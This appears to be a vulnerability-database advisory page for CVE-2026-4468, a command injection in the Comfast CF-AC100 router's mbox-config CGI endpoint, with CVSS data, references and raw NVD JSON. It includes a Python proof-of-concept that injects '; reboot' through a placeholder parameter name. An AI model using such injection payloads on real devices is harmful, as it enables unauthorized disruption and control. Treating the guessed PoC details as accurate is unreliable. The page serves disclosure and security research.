CVE-2026-4468

Description

A vulnerability was determined in Comfast CF-AC100 2.6.0.8. Affected is an unknown function of the file /cgi-bin/mbox-config?method=SET&section=update_interface_png. This manipulation causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

4.7

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Comfast CF-AC100 2.6.0.8

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL (replace with actual IP)
target_url = "http://192.168.1.1/cgi-bin/mbox-config"

# The vulnerable endpoint is update_interface_png with method SET
# Injection payload: executing 'reboot' command as a proof of concept
# Use shell metacharacter ';' to chain commands
payload = "; reboot"

# Construct the data payload
data = {
    "method": "SET",
    "section": "update_interface_png",
    "vulnerable_parameter": payload  # Actual parameter name may vary based on firmware
}

try:
    # Note: This exploit requires High Privileges (Admin authentication)
    # Cookies or Auth headers should be included if necessary
    response = requests.post(target_url, data=data, timeout=5)
    
    if response.status_code == 200:
        print("[+] Payload sent successfully. Check if device rebooted.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
        
except Exception as e:
    print(f"[!] Error occurred: {e}")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-4468
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-4468
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-4468/
[4] VulDB https://vuldb.com/cve/CVE-2026-4468
[5] https://github.com/jinhao118/cve/blob/main/ComFast%20CF-AC100-V2.6.0.8_4.md
[6] https://vuldb.com/?ctiid.351758
[7] https://vuldb.com/?id.351758
[8] https://vuldb.com/?submit.772878

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-4468", "sourceIdentifier": "[email protected]", "published": "2026-03-20T04:16:50.713", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A vulnerability was determined in Comfast CF-AC100 2.6.0.8. Affected is an unknown function of the file /cgi-bin/mbox-config?method=SET&section=update_interface_png. This manipulation causes command injection. The attack is possible to be carried out remotely. The exploit has been publicly disclosed and may be utilized. The vendor was contacted early about this disclosure but did not respond in any way."}, {"lang": "es", "value": "Se determinó una vulnerabilidad en Comfast CF-AC100 2.6.0.8. Se ve afectada una función desconocida del archivo /cgi-bin/mbox-config?method=SET&section=update_interface_png. Esta manipulación provoca inyección de comandos. El ataque puede ser llevado a cabo de forma remota. El exploit ha sido divulgado públicamente y puede ser utilizado. Se contactó con el proveedor con antelación sobre esta divulgación, pero no respondió de ninguna manera."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.0, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.7, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.2, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:M/C:P/I:P/A:P", "baseScore": 5.8, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "MULTIPLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 6.4, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://github.com/jinhao118/cve/blob/main/ComFast%20CF-AC100-V2.6.0.8_4.md", "source": "[email protected]"}, {"url": "https://vuldb.com/?ctiid.351758", "source": "[email protected]"}, {"url": "https://vuldb.com/?id.351758", "source": "[email protected]"}, {"url": "https://vuldb.com/?submit.772878", "source": "[email protected]"}]}}